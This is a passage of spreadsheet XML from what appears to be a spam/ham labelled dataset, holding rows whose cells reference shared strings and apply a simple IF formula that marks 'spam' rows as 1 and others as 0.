    <row r="1659" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1659" t="s">
        <v>6901</v>
      </c>
      <c r="B1659" t="s">
        <v>5294</v>
      </c>
      <c r="C1659" s="1">
        <f>IF(B1659="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1660" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1660" t="s">
        <v>6902</v>
      </c>
      <c r="B1660" t="s">
        <v>5297</v>
      </c>
      <c r="C1660" s="1">
        <f>IF(B1660="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1661" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1661" t="s">
        <v>6903</v>
      </c>
      <c r="B1661" t="s">
        <v>5294</v>
      </c>
      <c r="C1661" s="1">
        <f>IF(B1661="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1662" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1662" t="s">
        <v>6904</v>
      </c>
      <c r="B1662" t="s">
        <v>5294</v>
      </c>
      <c r="C1662" s="1">
        <f>IF(B1662="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1663" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1663" t="s">
        <v>6905</v>
      </c>
      <c r="B1663" t="s">
        <v>5294</v>
      </c>
      <c r="C1663" s="1">
        <f>IF(B1663="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1664" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1664" t="s">
        <v>6906</v>
      </c>
      <c r="B1664" t="s">
        <v>5297</v>
      </c>
      <c r="C1664" s="1">
        <f>IF(B1664="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1665" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1665" t="s">
        <v>6907</v>
      </c>
      <c r="B1665" t="s">
        <v>5294</v>
      </c>
      <c r="C1665" s="1">
        <f>IF(B1665="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1666" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1666" t="s">
        <v>6908</v>
      </c>
      <c r="B1666" t="s">
        <v>5294</v>
      </c>
      <c r="C1666" s="1">
        <f>IF(B1666="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1667" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1667" t="s">
        <v>6909</v>
      </c>
      <c r="B1667" t="s">
        <v>5294</v>
      </c>
      <c r="C1667" s="1">
        <f>IF(B1667="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1668" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1668" t="s">
        <v>6910</v>
      </c>
      <c r="B1668" t="s">
        <v>5294</v>
      </c>
      <c r="C1668" s="1">
        <f>IF(B1668="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1669" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1669" t="s">
        <v>6911</v>
      </c>
      <c r="B1669" t="s">
        <v>5294</v>
      </c>
      <c r="C1669" s="1">
        <f>IF(B1669="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1670" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1670" t="s">
        <v>6912</v>
      </c>
      <c r="B1670" t="s">
        <v>5294</v>
      </c>
      <c r="C1670" s="1">
        <f>IF(B1670="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1671" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1671" t="s">
        <v>6913</v>
      </c>
      <c r="B1671" t="s">
        <v>5294</v>
      </c>
      <c r="C1671" s="1">
        <f>IF(B1671="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1672" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1672" t="s">
        <v>6914</v>
      </c>
      <c r="B1672" t="s">
        <v>5294</v>
      </c>
      <c r="C1672" s="1">
        <f>IF(B1672="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1673" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1673" t="s">
        <v>6915</v>
      </c>
      <c r="B1673" t="s">
        <v>5294</v>
      </c>
      <c r="C1673" s="1">
        <f>IF(B1673="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1674" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1674" t="s">
        <v>6916</v>
      </c>
      <c r="B1674" t="s">
        <v>5297</v>
      </c>
      <c r="C1674" s="1">
        <f>IF(B1674="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1675" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1675" t="s">
        <v>6917</v>
      </c>
      <c r="B1675" t="s">
        <v>5297</v>
      </c>
      <c r="C1675" s="1">
        <f>IF(B1675="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1676" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1676" t="s">
        <v>6918</v>
      </c>
      <c r="B1676" t="s">
        <v>5294</v>
      </c>
      <c r="C1676" s="1">
        <f>IF(B1676="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1677" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1677" t="s">
        <v>6919</v>
      </c>
      <c r="B1677" t="s">
        <v>5294</v>
      </c>
      <c r="C1677" s="1">
        <f>IF(B1677="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1678" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1678" t="s">
        <v>6920</v>
      </c>
      <c r="B1678" t="s">
        <v>5294</v>
      </c>
      <c r="C1678" s="1">
        <f>IF(B1678="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1679" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1679" t="s">
        <v>6921</v>
      </c>
      <c r="B1679" t="s">
        <v>5294</v>
      </c>
      <c r="C1679" s="1">
        <f>IF(B1679="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1680" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1680" t="s">
        <v>6922</v>
      </c>
      <c r="B1680" t="s">
        <v>5294</v>
      </c>
      <c r="C1680" s="1">
        <f>IF(B1680="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1681" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1681" t="s">
        <v>5362</v>
      </c>
      <c r="B1681" t="s">
        <v>5294</v>
      </c>
      <c r="C1681" s="1">
        <f>IF(B1681="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1682" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1682" t="s">
        <v>6923</v>
      </c>
      <c r="B1682" t="s">
        <v>5294</v>
      </c>
      <c r="C1682" s="1">
        <f>IF(B1682="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1683" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1683" t="s">
        <v>6924</v>
      </c>
      <c r="B1683" t="s">
        <v>5294</v>
      </c>
      <c r="C1683" s="1">
        <f>IF(B1683="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1684" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1684" t="s">
        <v>6925</v>
      </c>
      <c r="B1684" t="s">
        <v>5294</v>
      </c>
      <c r="C1684" s="1">
        <f>IF(B1684="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1685" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1685" t="s">
        <v>6926</v>
      </c>
      <c r="B1685" t="s">
        <v>5294</v>
      </c>
      <c r="C1685" s="1">
        <f>IF(B1685="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1686" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1686" t="s">
        <v>6927</v>
      </c>
      <c r="B1686" t="s">
        <v>5294</v>
      </c>
      <c r="C1686" s="1">
        <f>IF(B1686="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1687" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1687" t="s">
        <v>6928</v>
      </c>
      <c r="B1687" t="s">
        <v>5294</v>
      </c>
      <c r="C1687" s="1">
        <f>IF(B1687="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1688" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1688" t="s">
        <v>6929</v>
      </c>
      <c r="B1688" t="s">
        <v>5297</v>
      </c>
      <c r="C1688" s="1">
        <f>IF(B1688="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1689" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1689" t="s">
        <v>6930</v>
      </c>
      <c r="B1689" t="s">
        <v>5297</v>
      </c>
      <c r="C1689" s="1">
        <f>IF(B1689="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1690" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1690" t="s">
        <v>6931</v>
      </c>
      <c r="B1690" t="s">
        <v>5294</v>
      </c>
      <c r="C1690" s="1">
        <f>IF(B1690="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1691" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1691" t="s">
        <v>6932</v>
      </c>
      <c r="B1691" t="s">
        <v>5294</v>
      </c>
      <c r="C1691" s="1">
        <f>IF(B1691="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1692" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1692" t="s">
        <v>5428</v>
      </c>
      <c r="B1692" t="s">
        <v>5297</v>
      </c>
      <c r="C1692" s="1">
        <f>IF(B1692="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1693" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1693" t="s">
        <v>6933</v>
      </c>
      <c r="B1693" t="s">
        <v>5294</v>
      </c>
      <c r="C1693" s="1">
        <f>IF(B1693="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1694" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1694" t="s">
        <v>6934</v>
      </c>
      <c r="B1694" t="s">
        <v>5294</v>
      </c>
      <c r="C1694" s="1">
        <f>IF(B1694="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1695" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1695" t="s">
        <v>6935</v>
      </c>
      <c r="B1695" t="s">
        <v>5294</v>
      </c>
      <c r="C1695" s="1">
        <f>IF(B1695="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1696" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1696" t="s">
        <v>6936</v>
      </c>
      <c r="B1696" t="s">
        <v>5294</v>
      </c>
      <c r="C1696" s="1">
        <f>IF(B1696="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1697" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1697" t="s">
        <v>6937</v>
      </c>
      <c r="B1697" t="s">
        <v>5294</v>
      </c>
      <c r="C1697" s="1">
        <f>IF(B1697="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1698" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1698" t="s">
        <v>6938</v>
      </c>
      <c r="B1698" t="s">
        <v>5294</v>
      </c>
      <c r="C1698" s="1">
        <f>IF(B1698="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1699" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1699" t="s">
        <v>6939</v>
      </c>
      <c r="B1699" t="s">
        <v>5294</v>
      </c>
      <c r="C1699" s="1">
        <f>IF(B1699="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1700" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1700" t="s">
        <v>6940</v>
      </c>
      <c r="B1700" t="s">
        <v>5297</v>
      </c>
      <c r="C1700" s="1">
        <f>IF(B1700="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1701" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1701" t="s">
        <v>6531</v>
      </c>
      <c r="B1701" t="s">
        <v>5294</v>
      </c>
      <c r="C1701" s="1">
        <f>IF(B1701="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1702" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1702" t="s">
        <v>6941</v>
      </c>
      <c r="B1702" t="s">
        <v>5294</v>
      </c>
      <c r="C1702" s="1">
        <f>IF(B1702="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1703" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1703" t="s">
        <v>6942</v>
      </c>
      <c r="B1703" t="s">
        <v>5294</v>
      </c>
      <c r="C1703" s="1">
        <f>IF(B1703="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1704" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1704" t="s">
        <v>6943</v>
      </c>
      <c r="B1704" t="s">
        <v>5294</v>
      </c>
      <c r="C1704" s="1">
        <f>IF(B1704="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1705" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1705" t="s">
        <v>6944</v>
      </c>
      <c r="B1705" t="s">
        <v>5294</v>
      </c>
      <c r="C1705" s="1">
        <f>IF(B1705="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1706" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1706" t="s">
        <v>6945</v>
      </c>
      <c r="B1706" t="s">
        <v>5294</v>
      </c>
      <c r="C1706" s="1">
        <f>IF(B1706="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1707" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1707" t="s">
        <v>6946</v>
      </c>
      <c r="B1707" t="s">
        <v>5294</v>
      </c>
      <c r="C1707" s="1">
        <f>IF(B1707="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1708" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1708" t="s">
        <v>6947</v>
      </c>
      <c r="B1708" t="s">
        <v>5294</v>
      </c>
      <c r="C1708" s="1">
        <f>IF(B1708="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1709" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1709" t="s">
        <v>6948</v>
      </c>
      <c r="B1709" t="s">
        <v>5294</v>
      </c>
      <c r="C1709" s="1">
        <f>IF(B1709="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1710" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1710" t="s">
        <v>6949</v>
      </c>
      <c r="B1710" t="s">
        <v>5294</v>
      </c>
      <c r="C1710" s="1">
        <f>IF(B1710="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1711" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1711" t="s">
        <v>6950</v>
      </c>
      <c r="B1711" t="s">
        <v>5294</v>
      </c>
      <c r="C1711" s="1">
        <f>IF(B1711="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1712" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1712" t="s">
        <v>6951</v>
      </c>
      <c r="B1712" t="s">
        <v>5294</v>
      </c>
      <c r="C1712" s="1">
        <f>IF(B1712="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1713" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1713" t="s">
        <v>6952</v>
      </c>
      <c r="B1713" t="s">
        <v>5294</v>
      </c>
      <c r="C1713" s="1">
        <f>IF(B1713="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1714" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1714" t="s">
        <v>6953</v>
      </c>
      <c r="B1714" t="s">
        <v>5294</v>
      </c>
      <c r="C1714" s="1">
        <f>IF(B1714="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1715" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1715" t="s">
        <v>6954</v>
      </c>
      <c r="B1715" t="s">
        <v>5297</v>
      </c>
      <c r="C1715" s="1">
        <f>IF(B1715="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1716" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1716" t="s">
        <v>6955</v>
      </c>
      <c r="B1716" t="s">
        <v>5294</v>
      </c>
      <c r="C1716" s="1">
        <f>IF(B1716="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1717" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1717" t="s">
        <v>6956</v>
      </c>
      <c r="B1717" t="s">
        <v>5294</v>
      </c>
      <c r="C1717" s="1">
        <f>IF(B1717="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1718" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1718" t="s">
        <v>6957</v>
      </c>
      <c r="B1718" t="s">
        <v>5294</v>
      </c>
      <c r="C1718" s="1">
        <f>IF(B1718="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1719" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1719" t="s">
        <v>6958</v>
      </c>
      <c r="B1719" t="s">
        <v>5297</v>
      </c>
      <c r="C1719" s="1">
        <f>IF(B1719="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1720" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1720" t="s">
        <v>6959</v>
      </c>
      <c r="B1720" t="s">
        <v>5294</v>
      </c>
      <c r="C1720" s="1">
        <f>IF(B1720="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1721" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1721" t="s">
        <v>6960</v>
      </c>
      <c r="B1721" t="s">
        <v>5294</v>
      </c>
      <c r="C1721" s="1">
        <f>IF(B1721="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1722" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1722" t="s">
        <v>5788</v>
      </c>
      <c r="B1722" t="s">
        <v>5294</v>
      </c>
      <c r="C1722" s="1">
        <f>IF(B1722="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1723" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1723" t="s">
        <v>6961</v>
      </c>
      <c r="B1723" t="s">
        <v>5294</v>
      </c>
      <c r="C1723" s="1">
        <f>IF(B1723="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1724" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1724" t="s">
        <v>6962</v>
      </c>
      <c r="B1724" t="s">
        <v>5294</v>
      </c>
      <c r="C1724" s="1">
        <f>IF(B1724="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1725" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1725" t="s">
        <v>6963</v>
      </c>
      <c r="B1725" t="s">
        <v>5294</v>
      </c>
      <c r="C1725" s="1">
        <f>IF(B1725="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1726" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1726" t="s">
        <v>6964</v>
      </c>
      <c r="B1726" t="s">
        <v>5294</v>
      </c>
      <c r="C1726" s="1">
        <f>IF(B1726="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1727" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1727" t="s">
        <v>6965</v>
      </c>
      <c r="B1727" t="s">
        <v>5294</v>
      </c>
      <c r="C1727" s="1">
        <f>IF(B1727="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1728" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1728" t="s">
        <v>6966</v>
      </c>
      <c r="B1728" t="s">
        <v>5294</v>
      </c>
      <c r="C1728" s="1">
        <f>IF(B1728="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1729" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1729" t="s">
        <v>6967</v>
      </c>
      <c r="B1729" t="s">
        <v>5294</v>
      </c>
      <c r="C1729" s="1">
        <f>IF(B1729="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1730" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1730" t="s">
        <v>6968</v>
      </c>
      <c r="B1730" t="s">
        <v>5294</v>
      </c>
      <c r="C1730" s="1">
        <f>IF(B1730="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1731" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1731" t="s">
        <v>6969</v>
      </c>
      <c r="B1731" t="s">
        <v>5294</v>
      </c>
      <c r="C1731" s="1">
        <f>IF(B1731="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1732" t="s">
        <v>6970</v>
      </c>
      <c r="B1732" t="s">
        <v>5294</v>
      </c>
      <c r="C1732" s="1">
        <f>IF(B1732="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1733" t="s">
        <v>6971</v>
      </c>
      <c r="B1733" t="s">
        <v>5294</v>
      </c>
      <c r="C1733" s="1">
        <f>IF(B1733="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1734" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1734" t="s">
        <v>6972</v>
      </c>
      <c r="B1734" t="s">
        <v>5294</v>
      </c>
      <c r="C1734" s="1">
        <f>IF(B1734="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1735" t="s">
        <v>6973</v>
      </c>
      <c r="B1735" t="s">
        <v>5297</v>
      </c>
      <c r="C1735" s="1">
        <f>IF(B1735="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1736" t="s">
        <v>6974</v>
      </c>
      <c r="B1736" t="s">
        <v>5294</v>
      </c>
      <c r="C1736" s="1">
        <f>IF(B1736="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1737" t="s">
        <v>6975</v>
      </c>
      <c r="B1737" t="s">
        <v>5294</v>
      </c>
      <c r="C1737" s="1">
        <f>IF(B1737="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1738" t="s">
        <v>6976</v>
      </c>
      <c r="B1738" t="s">
        <v>5294</v>
      </c>
      <c r="C1738" s="1">
        <f>IF(B1738="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1739" t="s">
        <v>5590</v>
      </c>
      <c r="B1739" t="s">
        <v>5294</v>
      </c>
      <c r="C1739" s="1">
        <f>IF(B1739="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1740" t="s">
        <v>6977</v>
      </c>
      <c r="B1740" t="s">
        <v>5294</v>
      </c>
      <c r="C1740" s="1">
        <f>IF(B1740="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1741" t="s">
        <v>6978</v>
      </c>
      <c r="B1741" t="s">
        <v>5294</v>
      </c>
      <c r="C1741" s="1">
        <f>IF(B1741="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1742" t="s">
        <v>6979</v>
      </c>
      <c r="B1742" t="s">
        <v>5297</v>
      </c>
      <c r="C1742" s="1">
        <f>IF(B1742="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1743" t="s">
        <v>6980</v>
      </c>
      <c r="B1743" t="s">
        <v>5294</v>
      </c>
      <c r="C1743" s="1">
        <f>IF(B1743="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1744" t="s">
        <v>6981</v>
      </c>
      <c r="B1744" t="s">
        <v>5294</v>
      </c>
      <c r="C1744" s="1">
        <f>IF(B1744="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1745" t="s">
        <v>6982</v>
      </c>
      <c r="B1745" t="s">
        <v>5294</v>
      </c>
      <c r="C1745" s="1">
        <f>IF(B1745="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1746" t="s">
        <v>6983</v>
      </c>
      <c r="B1746" t="s">
        <v>5297</v>
      </c>
      <c r="C1746" s="1">
        <f>IF(B1746="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1747" t="s">
        <v>6984</v>
      </c>
      <c r="B1747" t="s">
        <v>5294</v>
      </c>
      <c r="C1747" s="1">
        <f>IF(B1747="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1748" t="s">
        <v>6985</v>
      </c>
      <c r="B1748" t="s">
        <v>5294</v>
      </c>
      <c r="C1748" s="1">
        <f>IF(B1748="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1749" t="s">
        <v>6986</v>
      </c>
      <c r="B1749" t="s">
        <v>5294</v>
      </c>
      <c r="C1749" s="1">
        <f>IF(B1749="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1750" t="s">
        <v>6987</v>
      </c>
      <c r="B1750" t="s">
        <v>5294</v>
      </c>
      <c r="C1750" s="1">
        <f>IF(B1750="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1751" t="s">
        <v>6988</v>
      </c>
      <c r="B1751" t="s">
        <v>5294</v>
      </c>
      <c r="C1751" s="1">
        <f>IF(B1751="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1752" t="s">
        <v>6989</v>
      </c>
      <c r="B1752" t="s">
        <v>5294</v>
      </c>
      <c r="C1752" s="1">
        <f>IF(B1752="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1753" t="s">
        <v>6990</v>
      </c>
      <c r="B1753" t="s">
        <v>5294</v>
      </c>
      <c r="C1753" s="1">
        <f>IF(B1753="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1754" t="s">
        <v>6991</v>
      </c>
      <c r="B1754" t="s">
        <v>5294</v>
      </c>
      <c r="C1754" s="1">
        <f>IF(B1754="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1755" t="s">
        <v>6992</v>
      </c>
      <c r="B1755" t="s">
        <v>5294</v>
      </c>
      <c r="C1755" s="1">
        <f>IF(B1755="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1756" t="s">
        <v>6993</v>
      </c>
      <c r="B1756" t="s">
        <v>5294</v>
      </c>
      <c r="C1756" s="1">
        <f>IF(B1756="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1757" t="s">
        <v>6994</v>
      </c>
      <c r="B1757" t="s">
        <v>5294</v>
      </c>
      <c r="C1757" s="1">
        <f>IF(B1757="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1758" t="s">
        <v>6995</v>
      </c>
      <c r="B1758" t="s">
        <v>5294</v>
      </c>
      <c r="C1758" s="1">
        <f>IF(B1758="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1759" t="s">
        <v>6996</v>
      </c>
      <c r="B1759" t="s">
        <v>5294</v>
      </c>
      <c r="C1759" s="1">
        <f>IF(B1759="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1760" t="s">
        <v>6997</v>
      </c>
      <c r="B1760" t="s">
        <v>5294</v>
      </c>
      <c r="C1760" s="1">
        <f>IF(B1760="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1761" t="s">
        <v>6998</v>
      </c>
      <c r="B1761" t="s">
        <v>5294</v>
      </c>
      <c r="C1761" s="1">
        <f>IF(B1761="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1762" t="s">
        <v>6999</v>
      </c>
      <c r="B1762" t="s">
        <v>5294</v>
      </c>
      <c r="C1762" s="1">
        <f>IF(B1762="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
